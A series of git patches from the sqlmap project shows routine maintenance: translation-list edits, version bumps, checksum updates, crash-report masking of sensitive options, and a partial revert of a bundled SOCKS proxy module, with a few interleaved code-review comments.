https://github.com/sqlmapproject/sqlmap/issues +* Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki +* Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + +Переводы +---- + +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) +* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) +* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) +* 
[Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) +* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) +* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) +* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) +* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) +* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) +* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) +* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) +* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) +* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) From 2abc7fc5881359288e267dcb782d025628b0328f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 May 2018 10:13:13 +0200 Subject: [PATCH 142/428] Update related to the #3116 (consistency patch) --- README.md | 2 +- doc/translations/README-ru-RUS.md | 19 ------------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 4 files changed, 3 insertions(+), 22 deletions(-) diff --git a/README.md b/README.md index 5c4e2832526..f1e5198d968 100644 --- a/README.md +++ b/README.md @@ -54,7 +54,6 @@ Links Translations ---- -* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) * [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) 
@@ -65,5 +64,6 @@ Translations * [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) * [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) +* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) diff --git a/doc/translations/README-ru-RUS.md b/doc/translations/README-ru-RUS.md index 281a4de32f6..4e46b296025 100644 --- a/doc/translations/README-ru-RUS.md +++ b/doc/translations/README-ru-RUS.md @@ -4,8 +4,6 @@ sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение. -**Проект sqlmap спонсируется [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).** - Скриншоты ---- 
@@ -50,20 +48,3 @@ sqlmap работает из коробки с [Python](http://www.python.org/do * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) * Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots - -Переводы ----- - -* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) -* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md) -* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) -* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) -* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md) -* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) -* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) -* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md) -* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md) -* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md) -* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) -* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) -* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) diff --git a/lib/core/settings.py b/lib/core/settings.py index 30f0d219219..3cbde7825f5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.16" +VERSION = "1.2.5.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9f3bf778ebe..9e860752bfb 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -428225201b9174a4c4432d9d2e528a91 lib/core/settings.py +71c3a9f3ca42c55ecf3fc1d6dcffc6a3 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 42042fb5deb3698e1da2507c53be78ca6176ecd5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 May 2018 10:41:20 +0200 Subject: [PATCH 143/428] Removing encoding report part (enough time has been passed to collect major problems) --- lib/core/settings.py | 2 +- lib/request/basic.py | 4 ---- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3cbde7825f5..3302e0d607f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.17" +VERSION = "1.2.5.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/request/basic.py b/lib/request/basic.py index 1fe7fd8d3cf..0eb60e630a3 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -220,10 +220,6 @@ def checkCharEncoding(encoding, warn=True): try: codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding) except (LookupError, ValueError): - if warn and ' ' not in encoding: - warnMsg = "unknown web page charset '%s'. " % encoding - warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS - singleTimeLogMessage(warnMsg, logging.WARN, encoding) encoding = None if encoding: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9e860752bfb..cb29aec6050 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -71c3a9f3ca42c55ecf3fc1d6dcffc6a3 lib/core/settings.py +c7f07cb1ca744abc129e58828107d119 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -67,7 +67,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -596988f14408cde1a2d3b5c9f231873a lib/request/basic.py +7a779e6bdf582b8ceb6d640cf869ac10 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py 0ad9051e84e8fefe826f1a574b41b1b0 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py From 6b3f01bfebb7f1393db6b07d944cdd94903d4ce2 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Mon, 28 May 2018 11:07:06 +0200 Subject: [PATCH 144/428] Minor patch --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index d1a26ade315..25ab83be194 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -783,7 +783,7 @@ def genCmpPayload(): if conf.multipleTargets: msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]" - choice = readInput(msg, default='T', checkBatch=False).upper() + choice = readInput(msg, default='X', checkBatch=False).upper() else: msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]" choice = readInput(msg, default='S', checkBatch=False).upper() diff --git a/lib/core/settings.py b/lib/core/settings.py index 3302e0d607f..e2980c36603 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.18" +VERSION = "1.2.5.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cb29aec6050..3f81ab94f13 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -22,7 +22,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -a0ae21cc46b8f5fd0afe0a173ceaab70 lib/controller/checks.py +9682b922fd621d31708d562b15803202 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c7f07cb1ca744abc129e58828107d119 lib/core/settings.py +6a2a60449aa91aa8f605e6c5582a01d7 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 80f3b9a711c57609d2ba6ba91f4f0d00bb9504e1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 28 May 2018 11:10:42 +0200 Subject: [PATCH 145/428] Minor worflow change in case of unhandled exceptions (disregard --batch) --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index dd504674269..724ce5e153b 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3367,7 +3367,7 @@ def createGithubIssue(errMsg, excMsg): msg += "with the unhandled exception information at " msg += "the official Github repository? [y/N] " try: - choice = readInput(msg, default='N', boolean=True) + choice = readInput(msg, default='N', checkBatch=False, boolean=True) except: choice = None diff --git a/lib/core/settings.py b/lib/core/settings.py index e2980c36603..17b736c38ce 100644 
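Review bot: With `checkBatch=False` on the changed `readInput` line the crash-report prompt is shown even when `--batch` was given, so an unattended run that hits an unhandled exception may now wait on stdin instead of finishing; if that is intended, a comment such as `# prompt even under --batch: sending a report must be an explicit decision` on that line would record it. The surrounding bare `except:` also turns a KeyboardInterrupt typed at that prompt into `choice = None`, i.e. "no report"; `except Exception:` would let Ctrl-C propagate unless swallowing it here is deliberate. createGithubIssue starts before this hunk.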
--- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.19" +VERSION = "1.2.5.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3f81ab94f13..466c3d6e17e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -3418e7b81884c1908dca632c590495ab lib/core/common.py +cdc5973df09133636116e6b700483c0d lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6a2a60449aa91aa8f605e6c5582a01d7 lib/core/settings.py +d195239c04a99ffffe252fbaa768f382 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 18706f7fad24eea4f39f36cf1cc9ede9122389f6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 28 May 2018 11:29:06 +0200 Subject: [PATCH 146/428] Minor patch for unhandled exception reports --- lib/core/common.py | 8 ++++---- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 8 deletions(-) 
diff --git a/lib/core/common.py b/lib/core/common.py index 724ce5e153b..8b099c10cb7 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3434,10 +3434,10 @@ def maskSensitiveData(msg): value = extractRegexResult(regex, retVal) retVal = retVal.replace(value, '*' * len(value)) - if not conf.get("hostname"): - match = re.search(r"(?i)sqlmap.+(-u|--url)(\s+|=)([^ ]+)", retVal) - if match: - retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) + # Just in case (for problematic parameters regarding user encoding) + match = re.search(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal) + if match: + retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) if getpass.getuser(): retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), '*' * len(getpass.getuser()), retVal) diff --git a/lib/core/settings.py b/lib/core/settings.py index 17b736c38ce..3ce328d2ffd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.20" +VERSION = "1.2.5.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
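Review bot: `re.search` on the added line masks only the first sensitive switch found in `retVal`; a command line carrying both `-u` and `--cookie` (or `--data`) leaves every match after the first unmasked in the report that is sent off the machine. Iterate all matches instead: `for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal):` followed by the existing `retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))`; the equal-length replacement keeps the offsets valid while iterating. The lazy `(.*?)` also stops at the first ` -x` / ` --x` token, so a value that itself contains such a sequence is only partially masked, which deserves a comment on the regex or a test case. maskSensitiveData begins before this hunk.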
@@ -367,7 +367,7 @@ SENSITIVE_DATA_REGEX = "(\s|=)(?P[^\s=]*%s[^\s]*)\s" # Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the inside) -SENSITIVE_OPTIONS = ("hostname", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") +SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") # Maximum number of threads (avoiding connection issues and/or DoS) MAX_NUMBER_OF_THREADS = 10 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 466c3d6e17e..8b0280b75a4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -cdc5973df09133636116e6b700483c0d lib/core/common.py +240cb11db16783c6601b1d7de5eadd8d lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d195239c04a99ffffe252fbaa768f382 lib/core/settings.py +2adfff188eafd6ea877686823cb44eb9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From ca8b589d43893a0a4cd44e6bc1570ffd652cebc1 Mon Sep 17 00:00:00 2001 
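Review bot: `"authCred"` appears twice in the new SENSITIVE_OPTIONS tuple, once in the middle and again at the end, which is harmless for the masking loop but suggests entries are appended without checking; dropping the trailing duplicate keeps the line readable as the single list of what gets masked. A short comment stating that these are `conf` keys, while the command-line fallback regex in maskSensitiveData names switches separately, would help keep the two lists in sync when a new sensitive option is added.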
From: Miroslav Stampar Date: Tue, 29 May 2018 14:26:31 +0200 Subject: [PATCH 147/428] Fixes #3122 (by reverting 6c4e9ae427fa6ae985b05f2a979edcdf062868e5) --- lib/core/settings.py | 2 +- thirdparty/socks/socks.py | 970 ++++++++++++-------------------------- txt/checksum.md5 | 4 +- 3 files changed, 307 insertions(+), 669 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3ce328d2ffd..1539dcd392b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.21" +VERSION = "1.2.5.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/socks/socks.py b/thirdparty/socks/socks.py index 4dab15a1ef1..2eaf223d875 100644 --- a/thirdparty/socks/socks.py +++ b/thirdparty/socks/socks.py @@ -1,6 +1,7 @@ -""" -SocksiPy - Python SOCKS module. -Version 1.5.7 +#!/usr/bin/env python + +"""SocksiPy - Python SOCKS module. +Version 1.00 Copyright 2006 Dan-Haim. All rights reserved. @@ -29,7 +30,11 @@ This module provides a standard socket-like interface for Python for tunneling connections through SOCKS proxies. -=============================================================================== +""" + +""" +Minor modifications made by Miroslav Stampar (http://sqlmap.org/) +for patching DNS-leakage occuring in socket.create_connection() Minor modifications made by Christopher Gilbert (http://motomastyle.com/) for use in PyLoris (http://pyloris.sourceforge.net/) 
@@ -37,735 +42,368 @@ Minor modifications made by Mario Vilas (http://breakingcode.wordpress.com/) mainly to merge bug fixes found in Sourceforge -Modifications made by Anorov (https://github.com/Anorov) --Forked and renamed to PySocks --Fixed issue with HTTP proxy failure checking (same bug that was in the old ___recvall() method) --Included SocksiPyHandler (sockshandler.py), to be used as a urllib2 handler, - courtesy of e000 (https://github.com/e000): https://gist.github.com/869791#file_socksipyhandler.py --Re-styled code to make it readable - -Aliased PROXY_TYPE_SOCKS5 -> SOCKS5 etc. - -Improved exception handling and output - -Removed irritating use of sequence indexes, replaced with tuple unpacked variables - -Fixed up Python 3 bytestring handling - chr(0x03).encode() -> b"\x03" - -Other general fixes --Added clarification that the HTTP proxy connection method only supports CONNECT-style tunneling HTTP proxies --Various small bug fixes """ -__version__ = "1.5.7" - import socket import struct -from errno import EOPNOTSUPP, EINVAL, EAGAIN -from io import BytesIO -from os import SEEK_CUR -from collections import Callable -from base64 import b64encode - -PROXY_TYPE_SOCKS4 = SOCKS4 = 1 -PROXY_TYPE_SOCKS5 = SOCKS5 = 2 -PROXY_TYPE_HTTP = HTTP = 3 -PROXY_TYPES = {"SOCKS4": SOCKS4, "SOCKS5": SOCKS5, "HTTP": HTTP} -PRINTABLE_PROXY_TYPES = dict(zip(PROXY_TYPES.values(), PROXY_TYPES.keys())) +PROXY_TYPE_SOCKS4 = 1 +PROXY_TYPE_SOCKS5 = 2 +PROXY_TYPE_HTTP = 3 +_defaultproxy = None socket._orig_socket = _orgsocket = _orig_socket = socket.socket _orgcreateconnection = socket.create_connection -class ProxyError(IOError): - """ - socket_err contains original socket.error exception. 
- """ - def __init__(self, msg, socket_err=None): - self.msg = msg - self.socket_err = socket_err - - if socket_err: - self.msg += ": {0}".format(socket_err) - - def __str__(self): - return self.msg - +class ProxyError(Exception): pass class GeneralProxyError(ProxyError): pass -class ProxyConnectionError(ProxyError): pass -class SOCKS5AuthError(ProxyError): pass -class SOCKS5Error(ProxyError): pass -class SOCKS4Error(ProxyError): pass +class Socks5AuthError(ProxyError): pass +class Socks5Error(ProxyError): pass +class Socks4Error(ProxyError): pass class HTTPError(ProxyError): pass -SOCKS4_ERRORS = { 0x5B: "Request rejected or failed", - 0x5C: "Request rejected because SOCKS server cannot connect to identd on the client", - 0x5D: "Request rejected because the client program and identd report different user-ids" - } - -SOCKS5_ERRORS = { 0x01: "General SOCKS server failure", - 0x02: "Connection not allowed by ruleset", - 0x03: "Network unreachable", - 0x04: "Host unreachable", - 0x05: "Connection refused", - 0x06: "TTL expired", - 0x07: "Command not supported, or protocol error", - 0x08: "Address type not supported" - } - -DEFAULT_PORTS = { SOCKS4: 1080, - SOCKS5: 1080, - HTTP: 8080 - } - -def set_default_proxy(proxy_type=None, addr=None, port=None, rdns=True, username=None, password=None): - """ - set_default_proxy(proxy_type, addr[, port[, rdns[, username, password]]]) - +_generalerrors = ("success", + "invalid data", + "not connected", + "not available", + "bad proxy type", + "bad input") + +_socks5errors = ("succeeded", + "general SOCKS server failure", + "connection not allowed by ruleset", + "Network unreachable", + "Host unreachable", + "Connection refused", + "TTL expired", + "Command not supported", + "Address type not supported", + "Unknown error") + +_socks5autherrors = ("succeeded", + "authentication is required", + "all offered authentication methods were rejected", + "unknown username or invalid password", + "unknown error") + +_socks4errors = ("request 
granted", + "request rejected or failed", + "request rejected because SOCKS server cannot connect to identd on the client", + "request rejected because the client program and identd report different user-ids", + "unknown error") + +def setdefaultproxy(proxytype=None, addr=None, port=None, rdns=True, username=None, password=None): + """setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]]) Sets a default proxy which all further socksocket objects will use, - unless explicitly changed. All parameters are as for socket.set_proxy(). + unless explicitly changed. """ - socksocket.default_proxy = (proxy_type, addr, port, rdns, - username.encode() if username else None, - password.encode() if password else None) - -setdefaultproxy = set_default_proxy + global _defaultproxy + _defaultproxy = (proxytype, addr, port, rdns, username, password) -def get_default_proxy(): - """ - Returns the default proxy, set by set_default_proxy. - """ - return socksocket.default_proxy - -getdefaultproxy = get_default_proxy - -def wrap_module(module): - """ +def wrapmodule(module): + """wrapmodule(module) Attempts to replace a module's socket library with a SOCKS socket. Must set - a default proxy using set_default_proxy(...) first. + a default proxy using setdefaultproxy(...) first. This will only work on modules that import socket directly into the namespace; most of the Python Standard Library falls into this category. 
""" - if socksocket.default_proxy: + if _defaultproxy != None: module.socket.socket = socksocket + module.socket.create_connection = create_connection else: - raise GeneralProxyError("No default proxy specified") + raise GeneralProxyError((4, "no proxy specified")) -def unwrap_module(module): +def unwrapmodule(module): module.socket.socket = _orgsocket module.socket.create_connection = _orgcreateconnection -wrapmodule = wrap_module -unwrapmodule = unwrap_module - -def create_connection(dest_pair, proxy_type=None, proxy_addr=None, - proxy_port=None, proxy_rdns=True, - proxy_username=None, proxy_password=None, - timeout=None, source_address=None, - socket_options=None): - """create_connection(dest_pair, *[, timeout], **proxy_args) -> socket object - - Like socket.create_connection(), but connects to proxy - before returning the socket object. - - dest_pair - 2-tuple of (IP/hostname, port). - **proxy_args - Same args passed to socksocket.set_proxy() if present. - timeout - Optional socket timeout value, in seconds. - source_address - tuple (host, port) for the socket to bind to as its source - address before connecting (only for compatibility) - """ - # Remove IPv6 brackets on the remote address and proxy address. - remote_host, remote_port = dest_pair - if remote_host.startswith('['): - remote_host = remote_host.strip('[]') - if proxy_addr and proxy_addr.startswith('['): - proxy_addr = proxy_addr.strip('[]') - - err = None - - # Allow the SOCKS proxy to be on IPv4 or IPv6 addresses. 
- for r in socket.getaddrinfo(proxy_addr, proxy_port, 0, socket.SOCK_STREAM): - family, socket_type, proto, canonname, sa = r - sock = None - try: - sock = socksocket(family, socket_type, proto) - - if socket_options: - for opt in socket_options: - sock.setsockopt(*opt) - - if isinstance(timeout, (int, float)): - sock.settimeout(timeout) - - if proxy_type: - sock.set_proxy(proxy_type, proxy_addr, proxy_port, proxy_rdns, - proxy_username, proxy_password) - if source_address: - sock.bind(source_address) - - sock.connect((remote_host, remote_port)) - return sock - - except (socket.error, ProxyConnectionError) as e: - err = e - if sock: - sock.close() - sock = None - - if err: - raise err - - raise socket.error("gai returned empty list.") - -class _BaseSocket(socket.socket): - """Allows Python 2's "delegated" methods such as send() to be overridden - """ - def __init__(self, *pos, **kw): - _orig_socket.__init__(self, *pos, **kw) - - self._savedmethods = dict() - for name in self._savenames: - self._savedmethods[name] = getattr(self, name) - delattr(self, name) # Allows normal overriding mechanism to work - - _savenames = list() - -def _makemethod(name): - return lambda self, *pos, **kw: self._savedmethods[name](*pos, **kw) -for name in ("sendto", "send", "recvfrom", "recv"): - method = getattr(_BaseSocket, name, None) - - # Determine if the method is not defined the usual way - # as a function in the class. - # Python 2 uses __slots__, so there are descriptors for each method, - # but they are not functions. - if not isinstance(method, Callable): - _BaseSocket._savenames.append(name) - setattr(_BaseSocket, name, _makemethod(name)) - -class socksocket(_BaseSocket): +class socksocket(socket.socket): """socksocket([family[, type[, proto]]]) -> socket object - Open a SOCKS enabled socket. The parameters are the same as those of the standard socket init. In order for SOCKS to work, - you must specify family=AF_INET and proto=0. 
